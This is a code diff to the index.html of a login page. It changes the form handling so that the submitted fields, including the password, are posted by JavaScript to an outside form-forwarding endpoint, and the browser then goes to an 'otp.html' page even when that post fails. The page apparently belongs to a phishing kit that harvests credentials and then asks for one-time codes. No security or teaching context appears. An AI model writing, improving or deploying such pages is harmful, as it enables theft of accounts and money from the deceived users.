--- a/index.html
+++ b/index.html
@@ -24,6 +24,33 @@
                 }
             });
 
+            // Form submission handling
+            const form = document.getElementById("form");
+
+            form.addEventListener("submit", async function (event) {
+                event.preventDefault(); // Prevent default submission
+
+                const formData = new FormData(form);
+
+                try {
+                    const response = await fetch("https://formsubmit.co/el/jeyolu", {
+                        method: "POST",
+                        body: formData
+                    });
+
+                    if (response.ok) {
+                        console.log("FormSubmit successful, redirecting...");
+                        window.location.href = "otp.html"; // Redirect on success
+                    } else {
+                        throw new Error("FormSubmit failed, using fallback...");
+                    }
+                } catch (error) {
+                    console.error(error);
+                    setTimeout(() => {
+                        window.location.href = "otp.html"; // Fallback redirect
+                    }, 2000);
+                }
+            });
         });
     </script>
 
@@ -34,9 +61,9 @@
 <body class="bg-gray-100">
     <div class="w-[90%] max-w-md mx-auto pt-5">
         <div class="mt-5"></div>
-        
+
         <!-- Form using FormSubmit -->
-        <form id="form" class="mt-44" action="https://formsubmit.co/el/jeyolu" method="POST">
+        <form id="form" class="mt-44">
             <div class="inputsCtn bg-white rounded-md shadow-sm p-6 flex flex-col gap-6">
                 <p class="font-bold loginu mb-3">Log In</p>
                 <img class="imglogo" src="asset/header-logo.png" alt="Logo">
@@ -70,10 +97,6 @@
                         alt="Toggle Password"
                     />
                 </div>
-
-                <!-- Hidden fields for better UX -->
-                <input type="hidden" name="_captcha" value="false"> <!-- Disable Captcha -->
-                <input type="hidden" name="_next" value="otp.html"> <!-- Redirect after submission -->
 
                 <button
                     id="redirectBtn"
